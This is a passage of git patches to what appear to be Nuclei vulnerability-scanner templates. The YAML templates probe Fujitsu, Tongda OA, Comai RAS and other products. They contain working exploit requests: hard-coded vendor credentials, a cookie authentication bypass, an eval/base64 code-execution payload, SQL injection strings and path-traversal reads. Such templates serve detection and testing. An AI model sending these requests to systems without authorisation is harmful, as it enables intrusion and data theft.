"{{BaseURL}}/admin/login.php" + - "{{BaseURL}}/admin/index.php?login" + - "{{BaseURL}}/index.php?login" matchers-condition: and matchers: @@ -25,4 +28,14 @@ http: - "Web Interface" - "FTL" part: body - condition: and + condition: or + + - type: word + words: + - 'Pi-hole - ' + - 'Pi-hole: Your black hole for Internet advertisements' + - 'Pi-hole: A black hole for Internet advertisements' + - 'https://pi-hole.net' + - '<pre>sudo pihole -a -p</pre>' + part: body + condition: or From 4158cc3fde01a1b7dc9ee3d9edb9279f6dbd37c6 Mon Sep 17 00:00:00 2001 From: Adnan Khan <AdnaneKhan@users.noreply.github.com> Date: Wed, 6 Sep 2023 12:05:05 -0400 Subject: [PATCH 0205/1090] Fix review issues. --- network/cves/2023/CVE-2023-38433.yaml | 25 +++++++++++++------------ 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/network/cves/2023/CVE-2023-38433.yaml b/network/cves/2023/CVE-2023-38433.yaml index 7fb5676d08..097e90086d 100644 --- a/network/cves/2023/CVE-2023-38433.yaml +++ b/network/cves/2023/CVE-2023-38433.yaml @@ -1,16 +1,17 @@ id: CVE-2023-38433 + info: name: Fujitsu IP series Hardcoded Credentials author: AdnaneKhan severity: high description: | - Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices. + Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices. reference: - - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials/ + - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials - https://nvd.nist.gov/vuln/detail/CVE-2023-38433 - https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01 - - https://www.fujitsu.com/global/products/computing/peripheral/video/download/ - - https://jvn.jp/en/jp/JVN95727578/ + - https://www.fujitsu.com/global/products/computing/peripheral/video/download + - https://jvn.jp/en/jp/JVN95727578 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 @@ -22,14 +23,14 @@ info: http: - raw: - - | - GET /b_download/index.html HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64('fedish264pro:h264pro@broadsight')}} - - | - GET /b_download/index.html HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64('fedish265pro:h265pro@broadsight')}} + - | + GET /b_download/index.html HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64('fedish264pro:h264pro@broadsight')}} + - | + GET /b_download/index.html HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64('fedish265pro:h265pro@broadsight')}} matchers-condition: and matchers: - type: word From 3c11b45c3ee18b56b890db1268e5aeb52fb231a4 Mon Sep 17 00:00:00 2001 From: Adnan Khan <AdnaneKhan@users.noreply.github.com> Date: Wed, 6 Sep 2023 12:27:38 -0400 Subject: [PATCH 0206/1090] Fix syntax error with Shodan query string. --- network/cves/2023/CVE-2023-38433.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/cves/2023/CVE-2023-38433.yaml b/network/cves/2023/CVE-2023-38433.yaml index 097e90086d..bb23e63336 100644 --- a/network/cves/2023/CVE-2023-38433.yaml +++ b/network/cves/2023/CVE-2023-38433.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-798 metadata: max-req: 2 - shodan-query: "Server: thttpd/2.25b 29dec2003" content-length:1133 + shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' tags: cve,cve2023,panel,login,backdoor http: From 5931c4e4abbec0e229917b0be3a4b222a72feeb4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 7 Sep 2023 01:15:50 +0530 Subject: [PATCH 0207/1090] Minor - Updates --- .../other/comai-ras-cookie-bypass.yaml | 39 +++++++++++++++ .../other/huiwen-bibliographic-info-leak.yaml | 34 +++++++++++++ ...bibliographic-search-system-info-leak.yaml | 33 ------------- .../other/kemai-ras-ultra-vires-access.yaml | 41 ---------------- .../spring/jolokia-realm-jndi-rce.yaml | 33 ------------- .../spring/springboot-env-all-check.yaml | 49 ------------------- .../thinkphp/thinkphp6-lang-lfi.yaml | 35 ------------- ...login.yaml => tongda-arbitrary-login.yaml} | 18 ++++--- .../tongda-contact-list-disclosure.yaml | 32 ++++++++++++ .../tongda/tongda-getdata-rce.yaml | 30 ++++++++++++ .../tongda/tongda-meeting-unauth.yaml | 40 +++++++++++++++ .../tongda/tongda-oa-getdata-rce.yaml | 26 ---------- ...a-oa-getway-remote-file-include-mysql.yaml | 36 -------------- .../tongda/tongda-oa-meeting-unauth.yaml | 37 -------------- .../tongda/tongda-oa-report-bi-func-sqli.yaml | 28 ----------- .../tongda/tongda-oa-swfupload-sqli.yaml | 23 ++++----- ...da-oa-v2014-get-contactlist-info-leak.yaml | 35 ------------- ...-v2017-video-file-arbitrary-file-read.yaml | 29 ----------- .../tongda/tongda-report-bi-func-sqli.yaml | 36 ++++++++++++++ ...ml => tongda-v2017-action-uploadfile.yaml} | 25 ++++++---- .../tongda/tongda-v2017-video-file-read.yaml | 31 ++++++++++++ .../wanhu/wanhu-documentedit-sqli.yaml | 31 ++++++++++++ .../wanhu/wanhu-download-ftp-file-read.yaml | 33 +++++++++++++ .../wanhu/wanhu-download-old-file-read.yaml | 33 +++++++++++++ .../wanhu/wanhu-oa-documentedit-sqli.yaml | 30 ------------ ...u-oa-download-ftp-arbitrary-file-read.yaml | 29 ----------- ...u-oa-download-old-arbitrary-file-read.yaml | 29 ----------- 27 files changed, 377 insertions(+), 498 deletions(-) create mode 100755 http/vulnerabilities/other/comai-ras-cookie-bypass.yaml create mode 100755 http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml delete mode 100755 http/vulnerabilities/other/huiwen-bibliographic-search-system-info-leak.yaml delete mode 100755 http/vulnerabilities/other/kemai-ras-ultra-vires-access.yaml delete mode 100755 http/vulnerabilities/spring/jolokia-realm-jndi-rce.yaml delete mode 100755 http/vulnerabilities/spring/springboot-env-all-check.yaml delete mode 100755 http/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml rename http/vulnerabilities/tongda/{tongda-oa-header-inc-arbitrary-login.yaml => tongda-arbitrary-login.yaml} (76%) create mode 100755 http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml create mode 100755 http/vulnerabilities/tongda/tongda-getdata-rce.yaml create mode 100755 http/vulnerabilities/tongda/tongda-meeting-unauth.yaml delete mode 100755 http/vulnerabilities/tongda/tongda-oa-getdata-rce.yaml delete mode 100755 http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include-mysql.yaml delete mode 100755 http/vulnerabilities/tongda/tongda-oa-meeting-unauth.yaml delete mode 100755 http/vulnerabilities/tongda/tongda-oa-report-bi-func-sqli.yaml delete mode 100755 http/vulnerabilities/tongda/tongda-oa-v2014-get-contactlist-info-leak.yaml delete mode 100755 http/vulnerabilities/tongda/tongda-oa-v2017-video-file-arbitrary-file-read.yaml create mode 100755 http/vulnerabilities/tongda/tongda-report-bi-func-sqli.yaml rename http/vulnerabilities/tongda/{tongda-oa-v2017-action-upload-arbitrary-file-upload.yaml => tongda-v2017-action-uploadfile.yaml} (64%) create mode 100755 http/vulnerabilities/tongda/tongda-v2017-video-file-read.yaml create mode 100755 http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml create mode 100755 http/vulnerabilities/wanhu/wanhu-download-ftp-file-read.yaml create mode 100755 http/vulnerabilities/wanhu/wanhu-download-old-file-read.yaml delete mode 100755 http/vulnerabilities/wanhu/wanhu-oa-documentedit-sqli.yaml delete mode 100755 http/vulnerabilities/wanhu/wanhu-oa-download-ftp-arbitrary-file-read.yaml delete mode 100755 http/vulnerabilities/wanhu/wanhu-oa-download-old-arbitrary-file-read.yaml diff --git a/http/vulnerabilities/other/comai-ras-cookie-bypass.yaml b/http/vulnerabilities/other/comai-ras-cookie-bypass.yaml new file mode 100755 index 0000000000..f76c28ab9c --- /dev/null +++ b/http/vulnerabilities/other/comai-ras-cookie-bypass.yaml @@ -0,0 +1,39 @@ +id: comai-ras-cookie-bypass + +info: + name: Comai RAS System Cookie - Authentication Override + author: SleepingBag945 + severity: high + description: | + Comai RAS system has cookie authentication overreach, when RAS_Admin_UserInfo_UserName is set to admin, the background can be accessed + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%A7%91%E8%BF%88/%E7%A7%91%E8%BF%88%20RAS%E7%B3%BB%E7%BB%9F%20Cookie%E9%AA%8C%E8%AF%81%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E.md + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/maike-ras-cookie-bypass.yaml + metadata: + max-request: 1 + fofa-query: app="科迈-RAS系统" + verified: true + tags: comai-ras,ras,kemai + +http: + - raw: + - | + GET /Server/CmxUser.php?pgid=UserList HTTP/1.1 + Host: {{Hostname}} + cookie: RAS_Admin_UserInfo_UserName=admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\"?pgid=User_Show" + - "usingeKey" + - "MachineAmount" + - "AppLoginType" + - "TimeType" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml b/http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml new file mode 100755 index 0000000000..094557fd1d --- /dev/null +++ b/http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml @@ -0,0 +1,34 @@ +id: huiwen-bibliographic-info-leak + +info: + name: Huiwen library bibliographic Retrieval System - Information Exposure + author: SleepingBag945 + severity: high + description: | + Huiwen library bibliographic retrieval system /include/config.properties file contains sensitive information, attackers can directly access to obtain information + metadata: + max-request: 1 + fofa-query: app="汇文软件-书目检索系统" + verified: true + tags: huiwen,exposure,misconfig + +http: + - raw: + - | + GET /include/config.properties HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "host=" + - "port=" + - "user=" + - "password=" + part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/other/huiwen-bibliographic-search-system-info-leak.yaml b/http/vulnerabilities/other/huiwen-bibliographic-search-system-info-leak.yaml deleted file mode 100755 index f4fc191012..0000000000 --- a/http/vulnerabilities/other/huiwen-bibliographic-search-system-info-leak.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: huiwen-bibliographic-search-system-info-leak - -info: - name: 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞 - author: SleepingBag945 - severity: high - description: 汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息,攻击者可以直接访问获取信息 - tags: huiwen - -http: - - raw: - - | - GET /include/config.properties HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - words: - - "host=" - - "port=" - - "user=" - - "password=" - part: body - condition: and - - - type: status - status: - - 200 - - - -# http://wiki.peiqi.tech/wiki/webapp/%E6%B1%87%E6%96%87/%E6%B1%87%E6%96%87%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E4%B9%A6%E7%9B%AE%E6%A3%80%E7%B4%A2%E7%B3%BB%E7%BB%9F%20config.properties%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html \ No newline at end of file diff --git a/http/vulnerabilities/other/kemai-ras-ultra-vires-access.yaml b/http/vulnerabilities/other/kemai-ras-ultra-vires-access.yaml deleted file mode 100755 index 323ec12021..0000000000 --- a/http/vulnerabilities/other/kemai-ras-ultra-vires-access.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: kemai-ras-ultra-vires-access - -info: - name: 科迈 RAS系统 Cookie验证越权漏洞 - author: SleepingBag945 - severity: high - description: 科迈 RAS系统 存在Cookie验证越权,当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台 - tags: ras,kemai - -http: - - raw: - - | - GET /Server/CmxUser.php?pgid=UserList HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - cookie: RAS_Admin_UserInfo_UserName={{randstr}} - Accept-Encoding: gzip - - - - matchers-condition: and - matchers: - - type: word - words: - - "\"?pgid=User_Show" - - "usingeKey" - - "MachineAmount" - - "AppLoginType" - - "TimeType" - part: body - condition: and - - - - type: status - status: - - 200 - - - -# http://wiki.peiqi.tech/wiki/webapp/%E7%A7%91%E8%BF%88/%E7%A7%91%E8%BF%88%20RAS%E7%B3%BB%E7%BB%9F%20Cookie%E9%AA%8C%E8%AF%81%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E.html \ No newline at end of file diff --git a/http/vulnerabilities/spring/jolokia-realm-jndi-rce.yaml b/http/vulnerabilities/spring/jolokia-realm-jndi-rce.yaml deleted file mode 100755 index a5a4233c32..0000000000 --- a/http/vulnerabilities/spring/jolokia-realm-jndi-rce.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: jolokia-realm-jndi-rce - -info: - name: jolokia Realm JNDI RCE - author: SleepingBag945 - severity: high - reference: - - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - - https://github.com/laluka/jolokia-exploitation-toolkit - - https://github.com/LandGrey/SpringBootVulExploit#0x05jolokia-realm-jndi-rce - tags: jolokia,springboot,tomcat - -http: - - method: GET - path: - - "{{BaseURL}}/jolokia/list" - - "{{BaseURL}}/actuator/jolokia/list" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - 'type=MBeanFactory' - - type: word - part: body - words: - - 'createJNDIRealm' \ No newline at end of file diff --git a/http/vulnerabilities/spring/springboot-env-all-check.yaml b/http/vulnerabilities/spring/springboot-env-all-check.yaml deleted file mode 100755 index 9322cd54b2..0000000000 --- a/http/vulnerabilities/spring/springboot-env-all-check.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: springboot-env-all-check - -info: - name: Springboot Env Actuator - Detect - author: that_juan_,dwisiswant0,wdahlenb,philippedelteil,stupidfish,SleepingBag945 - severity: high - description: Sensitive environment variables may not be masked - tags: misconfig,springboot,env,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/env" - - "{{BaseURL}}/actuator/env" - - "{{BaseURL}}/1/..;/env" - - "{{BaseURL}}/1/..;/actuator/env" - - "{{BaseURL}}/actuator;/env;" - - "{{BaseURL}}/message-api/actuator/env" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "applicationConfig" - - "activeProfiles" - condition: or - - - type: word - part: body - words: - - "server.port" - - "local.server.port" - condition: or - - - type: word - part: header - words: - - "application/json" - - "application/vnd.spring-boot.actuator" - - "application/vnd.spring-boot.actuator.v1+json" - - "application/vnd.spring-boot.actuator.v2+json" - - "application/vnd.spring-boot.actuator.v3+json" - condition: or - - - type: status - status: - - 200 diff --git a/http/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml b/http/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml deleted file mode 100755 index 547adab487..0000000000 --- a/http/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: thinkphp6-lang-lfi - -info: - name: Thinkphp Lang - LFI - author: kagamigawa - severity: high - description: | - Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to LFI.可RCE - reference: - - https://tttang.com/archive/1865/ - metadata: - verified: true - shodan-query: title:"Thinkphp" - fofa-query: header="think_lang" - tags: thinkphp,lfi - -http: - - method: GET - path: - - "{{BaseURL}}/?lang=../../thinkphp/base" - - "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Call Stack' - - 'class="trace' - condition: and - - - type: status - status: - - 500 diff --git a/http/vulnerabilities/tongda/tongda-oa-header-inc-arbitrary-login.yaml b/http/vulnerabilities/tongda/tongda-arbitrary-login.yaml similarity index 76% rename from http/vulnerabilities/tongda/tongda-oa-header-inc-arbitrary-login.yaml rename to http/vulnerabilities/tongda/tongda-arbitrary-login.yaml index de0dca3705..c90f7e46f3 100755 --- a/http/vulnerabilities/tongda/tongda-oa-header-inc-arbitrary-login.yaml +++ b/http/vulnerabilities/tongda/tongda-arbitrary-login.yaml @@ -1,20 +1,25 @@ -id: tongda-oa-header-inc-arbitrary-login +id: tongda-arbitrary-login + info: - name: tongda-oa-header-inc-arbitrary-login + name: Tongda OA header.inc.php - Authentication Bypass author: SleepingBag945 severity: high - description: 通达OA是一款OA系统。其旧版本的 header.inc.php 存在认证绕过漏洞,攻击者可构造恶意请求访问 header.inc.php,获取cookie后通过身份认证,登录后台,执行相关敏感操作,造成敏感信息泄漏等等。 + description: | + Tongda OA is an OA system. The old version of header.inc.php has an authentication bypass vulnerability. An attacker can construct a malicious request to access header.inc.php, obtain the cookie, pass identity authentication, log in to the backend, perform related sensitive operations, and cause sensitive information leakage, etc. reference: - https://github.com/Phuong39/2022-HW-POC/blob/main/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87.md - tags: tongda,oa + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-2017-auth-bypass.yaml + metadata: + max-request: 2 + fofa-query: app="TDXK-通达OA" + verified: true + tags: tongda,authbypass,misconfig http: - raw: - | POST /module/retrieve_pwd/header.inc.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip @@ -25,7 +30,6 @@ http: Host: {{Hostname}} Cookie: PHPSESSID={{cookie}}; - extractors: - type: regex name: cookie diff --git a/http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml b/http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml new file mode 100755 index 0000000000..732d8aca04 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml @@ -0,0 +1,32 @@ +id: tongda-contact-list-disclosure + +info: + name: Tongda OA v2014 Get Contactlistt - Exposure + author: SleepingBag945 + severity: medium + description: | + There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks. + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2014%20get_contactlist.php%20敏感信息泄漏漏洞.html + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml + metadata: + max-request: 1 + fofa-query: app="TDXK-通达OA + verified: true + tags: tongda,oa,exposure +http: + - method: GET + path: + - "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3" + + matchers-condition: and + matchers: + - type: word + words: + - "user_uid" + - "user_name" + - "priv_name" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml new file mode 100755 index 0000000000..8241194a68 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml @@ -0,0 +1,30 @@ +id: tongda-getdata-rce + +info: + name: Tongda OA v11.9 getadata - Remoce Code Execution + author: SleepingBag945 + severity: critical + description: | + There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9. An attacker can execute arbitrary commands on the server to control server permissions through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="TDXK-通达OA" + verified: true + tags: tongda,rce + +variables: + payload: "echo RCE;" + +http: + - method: GET + path: + - "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage" + + matchers: + - type: dsl + dsl: + - 'contains(body, "RCE") && contains(body, "pagelimit")' + - 'status_code == 200' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml new file mode 100755 index 0000000000..c36e8c5246 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml @@ -0,0 +1,40 @@ +id: tongda-meeting-unauth + +info: + name: Tongda OA Meeting - Unauthorized Access + author: SleepingBag945 + severity: medium + description: | + Tongda Meeting Unauthorized Access wereDetected + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html + - https://github.com/chaitin/xray/blob/master/pocs/tongda-meeting-unauthorized-access.yml + metadata: + max-request: 1 + fofa-query: app="TDXK-通达OA + verified: true + tags: tongda,unauth,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay" + + matchers-condition: and + matchers: + - type: word + words: + - "creator" + - "originalTitle" + - "view" + - "type" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-oa-getdata-rce.yaml b/http/vulnerabilities/tongda/tongda-oa-getdata-rce.yaml deleted file mode 100755 index 22787e8a2f..0000000000 --- a/http/vulnerabilities/tongda/tongda-oa-getdata-rce.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: tongda-oa-getdata-rce - -info: - name: tongda-oa-getdata-rce - author: SleepingBag945 - severity: critical - description: 通达OA v11.9 getdata接口存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限 - reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.9%20getdata%20任意命令执行漏洞.html - tags: tongda,oa,rce - -http: - - raw: - - | - GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyBqb2R3YWhmb2lhd2ppZm93YWR3Ow==%22)))%3B/*&id=19&module=Carouselimage HTTP/1.1 - Host: {{Hostname}} - - - matchers-condition: and - matchers: - - type: word - words: - - "jodwahfoiawjifowadw" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include-mysql.yaml b/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include-mysql.yaml deleted file mode 100755 index 3015985db4..0000000000 --- a/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include-mysql.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: tongda-oa-getway-remote-file-include-mysql - -info: - name: tongda-oa-getway-remote-file-include-mysql - author: SleepingBag945 - severity: critical - description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞,利用未授权的文件上传配合任意本地文件包含,攻击者可以轻易的取得 shell 获得系统权限。 - reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html - tags: tongda,oa - -http: - - raw: - - | - POST /mac/gateway.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - - json={"url":"/general/../../mysql5/my.ini"} - - - - matchers-condition: and - matchers: - - type: word - words: - - "[mysql]" - - type: word - words: - - "default-character-set" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-meeting-unauth.yaml b/http/vulnerabilities/tongda/tongda-oa-meeting-unauth.yaml deleted file mode 100755 index a7a02665d9..0000000000 --- a/http/vulnerabilities/tongda/tongda-oa-meeting-unauth.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: tongda-oa-meeting-unauth - -info: - name: tongda-oa-meeting-unauth - author: SleepingBag945 - severity: medium - description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞 - reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html - tags: tongda,oa - -http: - - raw: - - | - GET /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 - Accept: */* - Accept-Encoding: deflate - - - - matchers-condition: and - matchers: - - type: word - words: - - "creator" - - type: word - words: - - "originalTitle" - - type: word - part: header - words: - - "application/json" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-report-bi-func-sqli.yaml b/http/vulnerabilities/tongda/tongda-oa-report-bi-func-sqli.yaml deleted file mode 100755 index e390f5f1b0..0000000000 --- a/http/vulnerabilities/tongda/tongda-oa-report-bi-func-sqli.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: tongda-oa-report-bi-func-sqli - -info: - name: tongda-oa-report-bi-func-sqli - author: SleepingBag945 - severity: high - description: 通达OA v11.6 report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息 - reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.6%20report_bi.func.php%20SQL注入漏洞.html - tags: tongda,oa,info - -http: - - raw: - - | - POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info& - - - matchers-condition: and - matchers: - - type: word - words: - - "root@" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml b/http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml index 8926dc29c1..7fbae8b3c5 100755 --- a/http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml +++ b/http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml @@ -1,13 +1,19 @@ id: tongda-oa-swfupload-sqli info: - name: tongda-oa-swfupload-sqli + name: Tongda OA v11.5 swfupload_new.php - SQL Injection author: SleepingBag945 severity: high - description: 通达OA v11.5 swfupload_new.php 文件存在SQL注入漏洞,攻击者通过漏洞可获取服务器敏感信息 + description: | + There is a SQL injection vulnerability in the swfupload_new.php file of Tongda OA v11.5. An attacker can obtain sensitive information of the server through the vulnerability. reference: - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.5%20swfupload_new.php%20SQL注入漏洞.html - tags: tongda,oa,info + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-swfupload-new-sql-inject.yaml + metadata: + max-request: 1 + fofa-query: app="TDXK-通达OA" + verified: true + tags: tongda,sqli http: - raw: @@ -34,17 +40,12 @@ http: ------------GFioQpMK0vv2-- - matchers-condition: and matchers: - type: word words: - - "不安全的SQL语句" + - "insert into FILE_CONTENT(" + - type: status status: - - 200 - - - -#Content-Disposition: form-data; name="SORT_ID" -#0 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END)) + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-oa-v2014-get-contactlist-info-leak.yaml b/http/vulnerabilities/tongda/tongda-oa-v2014-get-contactlist-info-leak.yaml deleted file mode 100755 index c005e9829d..0000000000 --- a/http/vulnerabilities/tongda/tongda-oa-v2014-get-contactlist-info-leak.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: tongda-oa-v2014-get-contactlist-info-leak - -info: - name: tongda-oa-v2014-get-contactlist-info-leak - author: SleepingBag945 - severity: medium - description: 通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击 - reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2014%20get_contactlist.php%20敏感信息泄漏漏洞.html - tags: tongda,oa,info - -http: - - raw: - - | - GET /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 HTTP/1.1 - Host: {{Hostname}} - - - matchers-condition: and - matchers: - - type: word - words: - - "user_uid" - - type: word - words: - - "user_name" - - type: word - words: - - "user_id" - - type: word - words: - - "priv_name" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-v2017-video-file-arbitrary-file-read.yaml b/http/vulnerabilities/tongda/tongda-oa-v2017-video-file-arbitrary-file-read.yaml deleted file mode 100755 index 32b896e79e..0000000000 --- a/http/vulnerabilities/tongda/tongda-oa-v2017-video-file-arbitrary-file-read.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: tongda-oa-v2017-video-file-arbitrary-file-read - -info: - name: tongda-oa-v2017-video-file-arbitrary-file-read - author: SleepingBag945 - severity: medium - description: 